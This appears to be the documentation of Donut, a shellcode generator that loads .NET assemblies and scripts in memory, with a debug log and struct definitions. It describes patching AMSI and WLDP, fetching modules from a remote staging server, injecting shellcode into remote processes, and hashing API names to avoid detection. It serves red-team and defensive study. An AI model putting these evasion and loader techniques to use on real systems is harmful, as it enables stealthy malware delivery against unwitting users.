461 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 2996694CA69B44E8
462 DEBUG: peb.c:87:FindExport(): 2996694ca69b44e8 is forwarded to api-ms-win-core-com-l1-1-0.CoUninitialize
463 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
464 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoUninitialize)
465 DEBUG: payload.c:127:ThreadProc(): Using module embedded in instance
466 DEBUG: inmem_dotnet.c:43:LoadAssembly(): Using module embedded in instance
467 DEBUG: inmem_dotnet.c:51:LoadAssembly(): CLRCreateInstance
468 DEBUG: inmem_dotnet.c:59:LoadAssembly(): ICLRMetaHost::GetRuntime("v4.0.30319")
469 DEBUG: inmem_dotnet.c:66:LoadAssembly(): ICLRRuntimeInfo::IsLoadable
470 DEBUG: inmem_dotnet.c:70:LoadAssembly(): ICLRRuntimeInfo::GetInterface
471 DEBUG: inmem_dotnet.c:78:LoadAssembly(): HRESULT: 00000000
472 DEBUG: inmem_dotnet.c:100:LoadAssembly(): ICorRuntimeHost::Start
473 DEBUG: inmem_dotnet.c:107:LoadAssembly(): ICorRuntimeHost::CreateDomain("TP7WFT9M")
474 DEBUG: inmem_dotnet.c:115:LoadAssembly(): IUnknown::QueryInterface
475 DEBUG: bypass.c:83:DisableAMSI(): Length of AmsiScanBuffer stub is 32 bytes.
476 DEBUG: bypass.c:89:DisableAMSI(): Overwriting AmsiScanBuffer
477 DEBUG: bypass.c:104:DisableAMSI(): Length of AmsiScanString stub is -16 bytes.
478 DEBUG: inmem_dotnet.c:123:LoadAssembly(): DisableAMSI OK
479 DEBUG: inmem_dotnet.c:127:LoadAssembly(): DisableWLDP OK
480 DEBUG: inmem_dotnet.c:134:LoadAssembly(): Copying 3072 bytes of assembly to safe array
481 DEBUG: inmem_dotnet.c:140:LoadAssembly(): AppDomain::Load_3
482 DEBUG: inmem_dotnet.c:147:LoadAssembly(): HRESULT : 00000000
483 DEBUG: inmem_dotnet.c:149:LoadAssembly(): Erasing assembly from memory
484 DEBUG: inmem_dotnet.c:155:LoadAssembly(): SafeArrayDestroy
485 DEBUG: inmem_dotnet.c:176:RunAssembly(): Using module embedded in instance
486 DEBUG: inmem_dotnet.c:184:RunAssembly(): Type is DLL
487 DEBUG: inmem_dotnet.c:255:RunAssembly(): SysAllocString("TestClass")
488 DEBUG: inmem_dotnet.c:259:RunAssembly(): SysAllocString("RunProcess")
489 DEBUG: inmem_dotnet.c:263:RunAssembly(): Assembly::GetType_2
490 DEBUG: inmem_dotnet.c:269:RunAssembly(): SafeArrayCreateVector(2 parameter(s))
491 DEBUG: inmem_dotnet.c:276:RunAssembly(): Adding "calc.exe" as parameter 1
492 DEBUG: inmem_dotnet.c:276:RunAssembly(): Adding "notepad.exe" as parameter 2
493 DEBUG: inmem_dotnet.c:292:RunAssembly(): Calling Type::InvokeMember_3
494 DEBUG: inmem_dotnet.c:306:RunAssembly(): Type::InvokeMember_3 : 00000000 : Success
495 DEBUG: inmem_dotnet.c:323:FreeAssembly(): Type::Release
496 DEBUG: inmem_dotnet.c:335:FreeAssembly(): Assembly::Release
497 DEBUG: inmem_dotnet.c:341:FreeAssembly(): AppDomain::Release
498 DEBUG: inmem_dotnet.c:347:FreeAssembly(): IUnknown::Release
499 DEBUG: inmem_dotnet.c:353:FreeAssembly(): ICorRuntimeHost::Stop
500 DEBUG: inmem_dotnet.c:356:FreeAssembly(): ICorRuntimeHost::Release
501 DEBUG: inmem_dotnet.c:362:FreeAssembly(): ICLRRuntimeInfo::Release
502 DEBUG: inmem_dotnet.c:368:FreeAssembly(): ICLRMetaHost::Release
503 DEBUG: payload.c:171:ThreadProc(): Erasing RW memory for instance
504 DEBUG: payload.c:174:ThreadProc(): Releasing RW memory for instance
505 </pre>
506
507 <p>Obviously you should be cautious with what files you decide to execute on your machine.</p>
508
509 </body>
510 </html>
+0
-511
docs/api.md less more
0
1 <html>
2 <body>
3
4 <h3>API</h3>
5
6 <ul>
7 <li><code>int DonutCreate(PDONUT_CONFIG pConfig)</code></li>
8 <li><code>int DonutDelete(PDONUT_CONFIG pConfig)</code></li>
9 </ul>
10
11 <p>When provided with a valid configuration, <code>DonutCreate</code> will generate a shellcode to execute a VBS/JS/EXE/DLL or XSL files in-memory. If the function returns <code>DONUT_ERROR_SUCCESS</code>, the configuration will contain three components:</p>
12
13 <ol>
14 <li>An encrypted <var>Instance</var></li>
15 <li>An encrypted <var>Module</var></li>
16 <li>A position-independent code (PIC) or shellcode with <var>Instance</var> embedded in it.</li>
17 </ol>
18
19 <p>The key to decrypt the <var>Module</var> is stored in the <var>Instance</var> so that if a module is discovered on a staging server by an adversary, it should not be possible to decrypt the contents without the instance. <code>DonutDelete</code> will release any memory allocated by a successful call to <code>DonutCreate</code>. The <var>Instance</var> will already be attached to the PIC ready for executing in-memory, but the module may require saving to disk if the PIC will retrieve it from a remote staging server.</p>
20
21 <h3>Configuration</h3>
22
23 <p>A configuration requires a target architecture (only x86 and x86-64 are currently supported), a path to a VBS/JS/EXE/DLL or XML file that will be executed in-memory by the shellcode, a namespace/class for a .NET assembly, including the name of a method to invoke and any parameters passed to the method. If the module will be stored on a staging server, a URL is required, but not a module name because that will be generated randomly.</p>
24
25 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CONFIG <span style='color:#800080; '>{</span>
26 <span style='color:#800000; font-weight:bold; '>int</span> arch<span style='color:#800080; '>;</span> <span style='color:#696969; '>// target architecture for shellcode </span>
27 <span style='color:#800000; font-weight:bold; '>char</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of domain to create for assembly</span>
28 <span style='color:#800000; font-weight:bold; '>char</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class and optional namespace</span>
29 <span style='color:#800000; font-weight:bold; '>char</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method to execute</span>
30 <span style='color:#800000; font-weight:bold; '>char</span> param<span style='color:#808030; '>[</span><span style='color:#808030; '>(</span>DONUT_MAX_PARAM<span style='color:#808030; '>+</span><span style='color:#008c00; '>1</span><span style='color:#808030; '>)</span><span style='color:#808030; '>*</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string parameters passed to method, separated by comma or semi-colon</span>
31 <span style='color:#800000; font-weight:bold; '>char</span> file<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// assembly to create module from </span>
32 <span style='color:#800000; font-weight:bold; '>char</span> url<span style='color:#808030; '>[</span>DONUT_MAX_URL<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to root path of where module will be on remote http server</span>
33 <span style='color:#800000; font-weight:bold; '>char</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version to use.</span>
34 <span style='color:#800000; font-weight:bold; '>char</span> modname<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of module written to disk</span>
35
36 <span style='color:#800000; font-weight:bold; '>int</span> mod_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// .NET EXE/DLL, VBS,JS,EXE,DLL,XSL</span>
37 uint64_t mod_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_MODULE</span>
38 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>mod<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to donut module</span>
39
40 <span style='color:#800000; font-weight:bold; '>int</span> inst_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL</span>
41 uint64_t inst_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_INSTANCE</span>
42 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>inst<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to donut instance</span>
43
44 uint64_t pic_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of shellcode</span>
45 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>pic<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to PIC/shellcode</span>
46 <span style='color:#800080; '>}</span> DONUT_CONFIG<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CONFIG<span style='color:#800080; '>;</span>
47 </pre>
48
49 <table border="1">
50 <tr>
51 <th>Member</th>
52 <th>Description</th>
53 </tr>
54 <tr>
55 <td><code>arch</code></td>
56 <td>Indicates the type of assembly code to generate. <code>DONUT_ARCH_X86</code> and <code>DONUT_ARCH_X64</code> are self-explanatory. <code>DONUT_ARCH_X84</code> indicates dual-mode that combines shellcode for both x86 and amd64. ARM64 will be supported at some point.</td>
57 </tr>
58 <tr>
59 <td><code>domain</code></td>
60 <td>AppDomain name to create. If one is not specified by the caller, it will be generated randomly.</td>
61 </tr>
62 <tr>
63 <td><code>cls</code></td>
64 <td>The class name with method to invoke. A namespace is optional. e.g: <var>namespace.class</var></td>
65 </tr>
66 <tr>
67 <td><code>method</code></td>
68 <td>The method that will be invoked by the shellcode once a .NET assembly is loaded into memory. This also holds the name of an exported API if the module is an unmanaged DLL.</td>
69 </tr>
70 <tr>
71 <td><code>param</code></td>
72 <td>Contains a list of parameters for the .NET method or DLL function. Each separated by semi-colon or comma.</td>
73 </tr>
74 <tr>
75 <td><code>file</code></td>
76 <td>The path of a supported file type: VBS/JS/EXE/DLL or XSL.</td>
77 </tr>
78 <tr>
79 <td><code>url</code></td>
80 <td>If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this should contain the server and path of where module will be stored. e.g: https://www.rogueserver.com/modules/</td>
81 </tr>
82 <tr>
83 <td><code>runtime</code></td>
84 <td>The CLR runtime version to use for the .NET assembly. If none is provided, donut will try read from meta header. If that fails, v4.0.30319 is used by default.</td>
85 </tr>
86 <tr>
87 <td><code>modname</code></td>
88 <td>If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this will contain a randomly generated name for the module that should be used when saving the contents of <code>mod</code> to disk.</td>
89 </tr>
90 <tr>
91 <td><code>mod_type</code></td>
92 <td>Indicates the type of file detected by <code>DonutCreate</code>. For example, <code>DONUT_MODULE_VBS</code> indicates a VBScript file.</td>
93 </tr>
94 <tr>
95 <td><code>mod_len</code></td>
96 <td>The total size of the <var>Module</var> pointed to by <code>mod</code>.</td>
97 </tr>
98 <tr>
99 <td><code>mod</code></td>
100 <td>Points to encrypted <var>Module</var>. If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this should be saved to file using the <code>modname</code> and accessible via HTTP server.</td>
101 </tr>
102 <tr>
103 <td><code>inst_type</code></td>
104 <td><code>DONUT_INSTANCE_PIC</code> indicates a self-contained payload which means the .NET assembly is embedded in executable code. <code>DONUT_INSTANCE_URL</code> indicates the .NET assembly is stored on a remote server with a URL embedded in the instance.</td>
105 </tr>
106 <tr>
107 <td><code>inst_len</code></td>
108 <td>The total size of the <var>Instance</var> pointed to by <code>inst</code>.</td>
109 </tr>
110 <tr>
111 <td><code>inst</code></td>
112 <td>Points to an encrypted <var>Instance</var> after a successful call to <code>DonutCreate</code>. Since it's already attached to the <code>pic</code>, this is only provided for debugging purposes.</td>
113 </tr>
114 <tr>
115 <td><code>pic_len</code></td>
116 <td>The size of data pointed to by <code>pic</code>.</td>
117 </tr>
118 <tr>
119 <td><code>pic</code></td>
120 <td>Points to executable code for the target architecture which also contains an instance. This should be injected into a remote process.</td>
121 </tr>
122 </table>
123
124 <p>Everything that follows here concerns internal workings of Donut and is not required to generate a payload.</p>
125
126 <h3>Instance</h3>
127
128 <p>The position-independent code will always contain an <var>Instance</var> which can be viewed simply as a configuration for the code itself. It will contain all the data that would normally be stored on the stack or in the <code>.data</code> and <code>.rodata</code> sections of an executable. Once the main code executes, it will decrypt the instance before attempting to resolve the address of API functions. If successful, it will check if an executable file is embedded or must be downloaded from a remote staging server. To verify successful decryption of a module, a randomly generated string stored in the <code>sig</code> field is hashed using <var>Maru</var> and compared with the value of <code>mac</code>.</p>
129
130 <pre style='color:#000000;background:#ffffff;'><span style='color:#696969; '>// everything required for an instance goes into the following structure</span>
131 <span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_INSTANCE <span style='color:#800080; '>{</span>
132 uint32_t len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// total size of instance</span>
133 DONUT_CRYPT key<span style='color:#800080; '>;</span> <span style='color:#696969; '>// decrypts instance</span>
134
135 uint64_t iv<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the 64-bit initial value for maru hash</span>
136
137 <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span>
138 uint64_t hash<span style='color:#808030; '>[</span><span style='color:#008c00; '>64</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// holds up to 64 api hashes</span>
139 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>addr<span style='color:#808030; '>[</span><span style='color:#008c00; '>64</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// holds up to 64 api addresses</span>
140 <span style='color:#696969; '>// include prototypes only if header included from payload.h</span>
141 <span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>ifdef</span><span style='color:#004a43; '> PAYLOAD_H</span>
142 <span style='color:#800000; font-weight:bold; '>struct</span> <span style='color:#800080; '>{</span>
143 <span style='color:#696969; '>// imports from kernel32.dll or kernelbase.dll</span>
144 LoadLibraryA_t LoadLibraryA<span style='color:#800080; '>;</span>
145 GetProcAddress_t <span style='color:#400000; '>GetProcAddress</span><span style='color:#800080; '>;</span>
146 GetModuleHandleA_t GetModuleHandleA<span style='color:#800080; '>;</span>
147 VirtualAlloc_t <span style='color:#400000; '>VirtualAlloc</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// required to allocate RW memory for instance </span>
148 VirtualFree_t <span style='color:#400000; '>VirtualFree</span><span style='color:#800080; '>;</span>
149 VirtualQuery_t <span style='color:#400000; '>VirtualQuery</span><span style='color:#800080; '>;</span>
150 VirtualProtect_t <span style='color:#400000; '>VirtualProtect</span><span style='color:#800080; '>;</span>
151 Sleep_t <span style='color:#400000; '>Sleep</span><span style='color:#800080; '>;</span>
152 MultiByteToWideChar_t <span style='color:#400000; '>MultiByteToWideChar</span><span style='color:#800080; '>;</span>
153 GetUserDefaultLCID_t <span style='color:#400000; '>GetUserDefaultLCID</span><span style='color:#800080; '>;</span>
154
155 <span style='color:#696969; '>// imports from oleaut32.dll</span>
156 SafeArrayCreate_t SafeArrayCreate<span style='color:#800080; '>;</span>
157 SafeArrayCreateVector_t SafeArrayCreateVector<span style='color:#800080; '>;</span>
158 SafeArrayPutElement_t SafeArrayPutElement<span style='color:#800080; '>;</span>
159 SafeArrayDestroy_t SafeArrayDestroy<span style='color:#800080; '>;</span>
160 SafeArrayGetLBound_t SafeArrayGetLBound<span style='color:#800080; '>;</span>
161 SafeArrayGetUBound_t SafeArrayGetUBound<span style='color:#800080; '>;</span>
162 SysAllocString_t SysAllocString<span style='color:#800080; '>;</span>
163 SysFreeString_t SysFreeString<span style='color:#800080; '>;</span>
164 LoadTypeLib_t LoadTypeLib<span style='color:#800080; '>;</span>
165
166 <span style='color:#696969; '>// imports from wininet.dll</span>
167 InternetCrackUrl_t InternetCrackUrl<span style='color:#800080; '>;</span>
168 InternetOpen_t InternetOpen<span style='color:#800080; '>;</span>
169 InternetConnect_t InternetConnect<span style='color:#800080; '>;</span>
170 InternetSetOption_t InternetSetOption<span style='color:#800080; '>;</span>
171 InternetReadFile_t InternetReadFile<span style='color:#800080; '>;</span>
172 InternetCloseHandle_t InternetCloseHandle<span style='color:#800080; '>;</span>
173 HttpOpenRequest_t HttpOpenRequest<span style='color:#800080; '>;</span>
174 HttpSendRequest_t HttpSendRequest<span style='color:#800080; '>;</span>
175 HttpQueryInfo_t HttpQueryInfo<span style='color:#800080; '>;</span>
176
177 <span style='color:#696969; '>// imports from mscoree.dll</span>
178 CorBindToRuntime_t CorBindToRuntime<span style='color:#800080; '>;</span>
179 CLRCreateInstance_t CLRCreateInstance<span style='color:#800080; '>;</span>
180
181 <span style='color:#696969; '>// imports from ole32.dll</span>
182 CoInitializeEx_t CoInitializeEx<span style='color:#800080; '>;</span>
183 CoCreateInstance_t CoCreateInstance<span style='color:#800080; '>;</span>
184 CoUninitialize_t CoUninitialize<span style='color:#800080; '>;</span>
185 <span style='color:#800080; '>}</span><span style='color:#800080; '>;</span>
186 <span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>endif</span>
187 <span style='color:#800080; '>}</span> api<span style='color:#800080; '>;</span>
188
189 <span style='color:#696969; '>// everything from here is encrypted</span>
190 <span style='color:#800000; font-weight:bold; '>int</span> api_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the 64-bit hashes of API required for instance to work</span>
191 <span style='color:#800000; font-weight:bold; '>int</span> dll_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the number of DLL to load before resolving API</span>
192 <span style='color:#800000; font-weight:bold; '>char</span> dll_name<span style='color:#808030; '>[</span>DONUT_MAX_DLL<span style='color:#808030; '>]</span><span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// a list of DLL strings to load</span>
193
194 <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span>
195 <span style='color:#800000; font-weight:bold; '>char</span> s<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// amsi.dll</span>
196 uint32_t w<span style='color:#808030; '>[</span><span style='color:#008c00; '>2</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span>
197 <span style='color:#800080; '>}</span> amsi<span style='color:#800080; '>;</span>
198
199 <span style='color:#800000; font-weight:bold; '>char</span> clr<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// clr.dll</span>
200 <span style='color:#800000; font-weight:bold; '>char</span> wldp<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// wldp.dll</span>
201 <span style='color:#800000; font-weight:bold; '>char</span> wldpQuery<span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WldpQueryDynamicCodeTrust</span>
202 <span style='color:#800000; font-weight:bold; '>char</span> wldpIsApproved<span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WldpIsClassInApprovedList</span>
203
204 <span style='color:#800000; font-weight:bold; '>char</span> amsiInit<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiInitialize</span>
205 <span style='color:#800000; font-weight:bold; '>char</span> amsiScanBuf<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiScanBuffer</span>
206 <span style='color:#800000; font-weight:bold; '>char</span> amsiScanStr<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiScanString</span>
207
208 uint16_t wscript<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WScript</span>
209 uint16_t wscript_exe<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// wscript.exe</span>
210
211 <span style='color:#603000; '>GUID</span> xIID_IUnknown<span style='color:#800080; '>;</span>
212 <span style='color:#603000; '>GUID</span> xIID_IDispatch<span style='color:#800080; '>;</span>
213
214 <span style='color:#696969; '>// GUID required to load .NET assemblies</span>
215 <span style='color:#603000; '>GUID</span> xCLSID_CLRMetaHost<span style='color:#800080; '>;</span>
216 <span style='color:#603000; '>GUID</span> xIID_ICLRMetaHost<span style='color:#800080; '>;</span>
217 <span style='color:#603000; '>GUID</span> xIID_ICLRRuntimeInfo<span style='color:#800080; '>;</span>
218 <span style='color:#603000; '>GUID</span> xCLSID_CorRuntimeHost<span style='color:#800080; '>;</span>
219 <span style='color:#603000; '>GUID</span> xIID_ICorRuntimeHost<span style='color:#800080; '>;</span>
220 <span style='color:#603000; '>GUID</span> xIID_AppDomain<span style='color:#800080; '>;</span>
221
222 <span style='color:#696969; '>// GUID required to run VBS and JS files</span>
223 <span style='color:#603000; '>GUID</span> xCLSID_ScriptLanguage<span style='color:#800080; '>;</span> <span style='color:#696969; '>// vbs or js</span>
224 <span style='color:#603000; '>GUID</span> xIID_IHost<span style='color:#800080; '>;</span> <span style='color:#696969; '>// wscript object</span>
225 <span style='color:#603000; '>GUID</span> xIID_IActiveScript<span style='color:#800080; '>;</span> <span style='color:#696969; '>// engine</span>
226 <span style='color:#603000; '>GUID</span> xIID_IActiveScriptSite<span style='color:#800080; '>;</span> <span style='color:#696969; '>// implementation</span>
227 <span style='color:#603000; '>GUID</span> xIID_IActiveScriptParse32<span style='color:#800080; '>;</span> <span style='color:#696969; '>// parser</span>
228 <span style='color:#603000; '>GUID</span> xIID_IActiveScriptParse64<span style='color:#800080; '>;</span>
229
230 <span style='color:#696969; '>// GUID required to run XSL files</span>
231 <span style='color:#603000; '>GUID</span> xCLSID_DOMDocument30<span style='color:#800080; '>;</span>
232 <span style='color:#603000; '>GUID</span> xIID_IXMLDOMDocument<span style='color:#800080; '>;</span>
233 <span style='color:#603000; '>GUID</span> xIID_IXMLDOMNode<span style='color:#800080; '>;</span>
234
235 <span style='color:#800000; font-weight:bold; '>int</span> type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL </span>
236
237 <span style='color:#800000; font-weight:bold; '>struct</span> <span style='color:#800080; '>{</span>
238 <span style='color:#800000; font-weight:bold; '>char</span> url<span style='color:#808030; '>[</span>DONUT_MAX_URL<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// staging server hosting donut module</span>
239 <span style='color:#800000; font-weight:bold; '>char</span> req<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// just a buffer for "GET"</span>
240 <span style='color:#800080; '>}</span> http<span style='color:#800080; '>;</span>
241
242 uint8_t sig<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string to hash</span>
243 uint64_t mac<span style='color:#800080; '>;</span> <span style='color:#696969; '>// to verify decryption ok</span>
244
245 DONUT_CRYPT mod_key<span style='color:#800080; '>;</span> <span style='color:#696969; '>// used to decrypt module</span>
246 uint64_t mod_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// total size of module</span>
247
248 <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span>
249 PDONUT_MODULE p<span style='color:#800080; '>;</span> <span style='color:#696969; '>// for URL</span>
250 DONUT_MODULE x<span style='color:#800080; '>;</span> <span style='color:#696969; '>// for PIC</span>
251 <span style='color:#800080; '>}</span> module<span style='color:#800080; '>;</span>
252 <span style='color:#800080; '>}</span> DONUT_INSTANCE<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_INSTANCE<span style='color:#800080; '>;</span>
253 </pre>
254
255 <h3>Module</h3>
256
257 <p>Modules can be embedded in an <var>Instance</var> or stored on a remote HTTP server.</p>
258
259 <pre style='color:#000000;background:#ffffff;'><span style='color:#696969; '>// everything required for a module goes in the following structure</span>
260 <span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_MODULE <span style='color:#800080; '>{</span>
261 <span style='color:#603000; '>DWORD</span> type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// EXE, DLL, JS, VBS, XSL</span>
262 <span style='color:#603000; '>WCHAR</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version for .NET EXE/DLL</span>
263 <span style='color:#603000; '>WCHAR</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// domain name to use for .NET EXE/DLL</span>
264 <span style='color:#603000; '>WCHAR</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class and optional namespace for .NET EXE/DLL</span>
265 <span style='color:#603000; '>WCHAR</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method to invoke for .NET DLL or api for unmanaged DLL</span>
266 <span style='color:#603000; '>DWORD</span> param_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// number of parameters for DLL/EXE</span>
267 <span style='color:#603000; '>WCHAR</span> param<span style='color:#808030; '>[</span>DONUT_MAX_PARAM<span style='color:#808030; '>]</span><span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string parameters for DLL/EXE</span>
268 <span style='color:#603000; '>CHAR</span> sig<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// random string to verify decryption</span>
269 ULONG64 mac<span style='color:#800080; '>;</span> <span style='color:#696969; '>// to verify decryption was ok</span>
270 ULONG64 len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of EXE/DLL/XSL/JS/VBS file</span>
271 <span style='color:#603000; '>BYTE</span> data<span style='color:#808030; '>[</span><span style='color:#008c00; '>4</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// data of EXE/DLL/XSL/JS/VBS file</span>
272 <span style='color:#800080; '>}</span> DONUT_MODULE<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_MODULE<span style='color:#800080; '>;</span>
273 </pre>
274
275 <h3>API Hashing</h3>
276
277 <p>A hash function called <em>Maru</em> is used to resolve the address of API at runtime. It uses a Davies-Meyer construction and the SPECK block cipher to derive a 64-bit hash from an API string. The padding is similar to what's used by MD4 and MD5 except only 32-bits of the string length are stored in the buffer instead of 64-bits. An initial value (IV) chosen randomly ensures the 64-bit API hashes are unique for each instance and cannot be used for detection of Donut. Future releases will likely support alternative methods of resolving address of API to decrease chance of detection.</p>
278
279 <h3>Encryption</h3>
280
281 <p>The following structure is used to hold a master key, counter and nonce for Donut, which are generated randomly.</p>
282
283 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CRYPT <span style='color:#800080; '>{</span>
284 <span style='color:#603000; '>BYTE</span> mk<span style='color:#808030; '>[</span>DONUT_KEY_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// master key</span>
285 <span style='color:#603000; '>BYTE</span> ctr<span style='color:#808030; '>[</span>DONUT_BLK_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// counter + nonce</span>
286 <span style='color:#800080; '>}</span> DONUT_CRYPT<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CRYPT<span style='color:#800080; '>;</span>
287 </pre>
288
289 <p>Chaskey, a 128-bit block cipher with support for 128-bit keys, is used in Counter (CTR) mode to decrypt a <var>Module</var> or an <var>Instance</var> at runtime. If an adversary discovers a staging server, it should not be feasible for them to decrypt a donut module without the key which is stored in the donut payload. </p>
290
291 <h3>Debugging payload</h3>
292
293 <p>The payload is capable of displaying detailed information about each step executing a file in-memory and can be useful in tracking down bugs. To build a debug-enabled executable, specify the debug label with nmake/make for both donut.c and payload.c.</p>
294
295 <pre>
296 nmake debug -f Makefile.msvc
297 make debug -f Makefile.mingw
298 </pre>
299
300 <p>Use donut to create a payload as you normally would and a file called <code>instance</code> will be saved to disk.</p>
301
302 <pre>
303 c:\hub\donut>donut -fClass1.dll -cTestClass -mRunProcess -pcalc.exe,notepad.exe
304
305 [ Donut shellcode generator v0.9.2
306 [ Copyright (c) 2019 TheWover, Odzhan
307
